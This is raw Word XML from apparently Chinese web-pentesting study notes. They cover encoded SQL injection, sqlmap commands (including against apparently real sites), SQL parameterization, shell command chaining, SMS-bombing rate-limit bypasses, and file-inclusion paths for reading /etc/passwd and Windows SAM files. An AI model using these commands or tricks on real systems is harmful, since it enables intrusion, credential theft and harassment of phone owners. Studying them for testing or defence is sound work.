    <w:p w14:paraId="47855F52" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A6AC05" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2236DA" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9F0669" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="659B70A1" wp14:editId="173CBDA9">
            <wp:extent cx="5274310" cy="3016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D358" w14:textId="77777777" w:rsidR="00921670" w:rsidRDefault="00921670" w:rsidP="00164D08"/>
    <w:p w14:paraId="5149B1B5" w14:textId="77777777" w:rsidR="00921670" w:rsidRDefault="00921670" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二次编码注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13334552" w14:textId="77777777" w:rsidR="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1044C8D3" wp14:editId="39D9049E">
            <wp:extent cx="5274310" cy="2965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2917" w14:textId="77777777" w:rsidR="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>urldecode（）编码变成%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F02A14" w14:textId="77777777" w:rsidR="00921670" w:rsidRPr="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>%2527</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B091F" w14:textId="62E19D42" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qlmap使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045AD1C2" w14:textId="77777777" w:rsidR="00C314AE" w:rsidRDefault="00C314AE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9D9135" w14:textId="3F8DBAEA" w:rsidR="00C314AE" w:rsidRDefault="00C314AE" w:rsidP="00C314AE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--delay  每次http(s)请求之间延迟时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE9CB84" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w14:paraId="10317E51" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>--threads 10 //如果你玩过 msfconsole的话会对这个很熟悉 sqlmap线程最高设置为10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7AA76" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>--level 3 //sqlmap默认测试所有的GET和POST参数，当--level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高可到5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3642E" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>--risk 3 // 执行测试的风险（0-3，默认为1）risk越高，越慢但是越安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19872775" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>----search //后面跟参数 -D -T -C 搜索列（S），表（S）和或数据库名称（S） 如果你脑子够聪明，应该知道库列表名中可能会有ctf,flag等字样，结果有时候题目就是这么耿直对吧？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710178CF" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="000A449A" w:rsidRDefault="00A14128" w:rsidP="00A14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449A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlmap -u "http://chinalover.sinaapp.com/SQL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Pr="000A449A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GBK/index.php?id=1%df%27" --search -C flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60849E13" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="000A449A" w:rsidRDefault="00A14128" w:rsidP="00A14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449A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--level 3 --risk 1 --thread 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB128ED" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>sqlmap -u "</w:t>
      </w:r>
      <w:r w:rsidRPr="00B403D9">
        <w:t xml:space="preserve"> http://www.yr17.net/productview.php?productid=3059</w:t>
      </w:r>
      <w:r>
        <w:t>" --batch -v 3 --tamper "unmagicquotes.py" –dbs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宽字节绕过注入）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597BE6C2" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r w:rsidRPr="00B403D9">
        <w:t>sqlmap -u http://www.yr17.net/productview.php?productid=3059  --tamper unmagicquotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01509871" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128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593038E" wp14:editId="03FC367B">
            <wp:extent cx="5274310" cy="28155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D31D" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00BB3AB0" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t xml:space="preserve">sqlmap.py -u </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId141" w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://127.0.0.1/sqli-labs-master/Less-8/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A14128">
        <w:t xml:space="preserve"> --technique B --dbms mysql --batch -v 0</w:t>
      </w:r>
      <w:r w:rsidR="00A14128">
        <w:br/>
        <w:t>或者：</w:t>
      </w:r>
      <w:r w:rsidR="00A14128">
        <w:br/>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>python sqlmap.py -u "</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId142" w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://127.0.0.1/sqli-labs-master/Less-8/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A14128">
        <w:t>" --technique B --dbs --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A53AB85" w14:textId="45403486" w:rsidR="00A14128" w:rsidRDefault="00F41B50" w:rsidP="00F41B50">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sql预编译和参数化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2BCFE5" w14:textId="35907CF5" w:rsidR="00F41B50" w:rsidRDefault="00F41B50" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41B50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数化</w:t>
      </w:r>
      <w:r>
        <w:t>处理sql 是将参数进行了字符串化处理，把参数中的单引号，井号#，等都做了转义处理，进而在执行sql语句时不会被当做sql中的定界符和指定符来执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7E433" w14:textId="74612B50" w:rsidR="00A14128" w:rsidRPr="00F41B50" w:rsidRDefault="00F41B50" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41B50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>预编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D21443" w14:textId="4A50EFE5" w:rsidR="00F41B50" w:rsidRDefault="00F41B50" w:rsidP="00A14128">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D9C6BCA" wp14:editId="3DDEB751">
            <wp:extent cx="5274310" cy="6858000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="54" name="图片 5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3047" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2A539A" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="00CD3AF6" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436DD20C" w14:textId="2206DF71" w:rsidR="00122846" w:rsidRDefault="00122846" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7580B724" w14:textId="77777777" w:rsidR="00122846" w:rsidRPr="00122846" w:rsidRDefault="00122846" w:rsidP="0012284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2846">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方式：command1 &amp;&amp; command2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FED6C3" w14:textId="14E1495C" w:rsidR="00122846" w:rsidRPr="00122846" w:rsidRDefault="00122846" w:rsidP="0012284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2846">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果command1执行成功，则执行command2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD0CA0E" w14:textId="77777777" w:rsidR="00122846" w:rsidRPr="00122846" w:rsidRDefault="00122846" w:rsidP="0012284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2846">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方式：command1 || command2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E48435" w14:textId="77777777" w:rsidR="00122846" w:rsidRPr="00122846" w:rsidRDefault="00122846" w:rsidP="0012284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2846">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果command1执行失败，则执行command2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6B93B" w14:textId="76DDD974" w:rsidR="00122846" w:rsidRPr="00122846" w:rsidRDefault="00122846" w:rsidP="00122846">
      <w:r>
        <w:t>&amp;  顺序执行多条命令，而不管命令是否执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D60426" w14:textId="36430043" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信轰炸技巧：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016A1168" w14:textId="484DA50A" w:rsidR="00A14128" w:rsidRDefault="00BB3AB0" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId144" w:history="1">
        <w:r w:rsidR="00A14128" w:rsidRPr="00B01FDE">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
          </w:rPr>
          <w:t>https://www.anquanke.com/post/id/93878</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DF00219" w14:textId="77777777" w:rsidR="00863453" w:rsidRPr="00863453" w:rsidRDefault="00863453" w:rsidP="00863453">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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6345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删除Cookie值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8D2969" w14:textId="77777777" w:rsidR="00863453" w:rsidRPr="00863453" w:rsidRDefault="00863453" w:rsidP="00863453">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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6345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手机号后加空格或者\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C14CCB" w14:textId="77777777" w:rsidR="00863453" w:rsidRPr="00863453" w:rsidRDefault="00863453" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2A6FF6" w14:textId="77777777" w:rsidR="008C4CAF" w:rsidRDefault="008C4CAF" w:rsidP="00A1412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在手机号后面加一个逗号会发现他会继续发送一条短信</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40161E83" w14:textId="77777777" w:rsidR="008C4CAF" w:rsidRDefault="008C4CAF" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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继续增加一个逗号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D6D58" w14:textId="77777777" w:rsidR="008C4CAF" w:rsidRPr="008C4CAF" w:rsidRDefault="008C4CAF" w:rsidP="008C4CAF">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="330" w:after="33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8C4CAF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并且经过测试，逗号、点、减号等等均可能达到绕过的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51789612" w14:textId="77777777" w:rsidR="008C4CAF" w:rsidRPr="008C4CAF" w:rsidRDefault="008C4CAF" w:rsidP="008C4CAF">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="330" w:after="33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8C4CAF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在大疆的这个例子中，此方法还绕过了系统设置的每小时和每天短信发送的最大数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2206DC" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266DE2FE" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="002D5237" w:rsidP="00A14128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DC2C2A1" wp14:editId="33B1924D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-161567</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>978038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1901190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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99F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见</w:t>
      </w:r>
      <w:r w:rsidR="00A14128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库服务器</w:t>
      </w:r>
      <w:r w:rsidR="0039199F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭配</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9DF2C" w14:textId="77777777" w:rsidR="00972178" w:rsidRPr="00972178" w:rsidRDefault="00972178" w:rsidP="00972178"/>
    <w:p w14:paraId="6FE37DF6" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w14:paraId="0564448D" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A68433" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792A9475" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="00A14128" w:rsidP="00CA2DA4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E465888" wp14:editId="2BBF3AF7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>596265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5162550" cy="306705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E3720" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="00A14128" w:rsidP="00CA2DA4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245DC3C" wp14:editId="2D1EE714">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-111760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3965133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2856865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="63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5B2BE" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4207276C" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27803294" w14:textId="77777777" w:rsidR="00CD3AF6" w:rsidRDefault="00CD3AF6" w:rsidP="000A449A"/>
    <w:p w14:paraId="7C211128" w14:textId="77777777" w:rsidR="008F3489" w:rsidRDefault="008F3489" w:rsidP="008F3489">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台登录的逻辑漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C30FB" w14:textId="77777777" w:rsidR="008F3489" w:rsidRPr="008F3489" w:rsidRDefault="008F3489" w:rsidP="008F3489">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3489">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://bbs.ichunqiu.com/forum.php?mod=viewthread&amp;tid=48686&amp;highlight=%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520FD3FD" w14:textId="77777777" w:rsidR="008F3489" w:rsidRDefault="008F3489" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444483B3" w14:textId="77777777" w:rsidR="00FA7087" w:rsidRDefault="00FA7087" w:rsidP="00FA7087">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D4E5C" w14:textId="0DF1D1DD" w:rsidR="00BC34FC" w:rsidRDefault="00BB3AB0" w:rsidP="00BC34FC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId148" w:history="1">
        <w:r w:rsidR="00BC34FC">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://thief.one/2017/04/10/2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="110CC1D6" w14:textId="77777777" w:rsidR="00290E17" w:rsidRDefault="00290E17" w:rsidP="00BC34FC"/>
    <w:p w14:paraId="4933DB37" w14:textId="5535D9D0" w:rsidR="00BC34FC" w:rsidRDefault="00290E17" w:rsidP="00BC34FC">
      <w:r w:rsidRPr="00290E17">
        <w:t>https://www.cnblogs.com/bmjoker/p/9035358.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DA4DF" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00BC34FC"/>
    <w:p w14:paraId="3A5ADB53" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00BC34FC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前提：需要开启allow_url_fopen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9CD099" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BB3AB0" w:rsidP="00BC34FC">
      <w:pPr>
        <w:pStyle w:val="a3"/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hyperlink r:id="rId149" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00BC34FC">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="0593D3"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.xxx.com/index.php?page=/etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BC34FC">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Windows: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4770"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC34FC" w14:paraId="2ABA7C54" w14:textId="77777777" w:rsidTr="00BC3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B686D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1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E21E8C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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24BAD1EE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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E144E9C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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C188485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0D7F4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c:\boot.ini</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C898C39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c:\windows\systems32\inetsrv\MetaBase.xml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D545B8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c:\windows\repair\sam</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E0639C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c:\windows\php.ini             php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>配置文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="665A2140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c:\windows\my.ini               mysql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>配置文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F406174" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00BC34FC">
      <w:pPr>
        <w:pStyle w:val="a3"/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LINUX:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7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7810"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC34FC" w14:paraId="16C0B67B" w14:textId="77777777" w:rsidTr="00BC3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78F28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1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156BE094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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="669348BB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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B5A2C43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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D60E9A0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F4616" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00B240C0">
            <w:pPr>
              <w:pStyle w:val="HTML"/>
              <w:shd w:val="clear" w:color="auto" w:fill="2D2D2D"/>
              <w:ind w:firstLineChars="3300" w:firstLine="660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/etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B60A537" w14:textId="77777777" w:rsidR="00B240C0" w:rsidRPr="00B240C0" w:rsidRDefault="00B240C0" w:rsidP="00BC34FC">
            <w:pPr>
              <w:pStyle w:val="HTML"/>
              <w:shd w:val="clear" w:color="auto" w:fill="2D2D2D"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55AF060C" w14:textId="77777777" w:rsidR="00B240C0" w:rsidRPr="00B240C0" w:rsidRDefault="00B240C0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</w:p>
          <w:p w14:paraId="3687D6BF" w14:textId="77777777" w:rsidR="00D54804" w:rsidRDefault="00D54804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</w:p>
          <w:p w14:paraId="144635CE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/usr/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="builtin"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
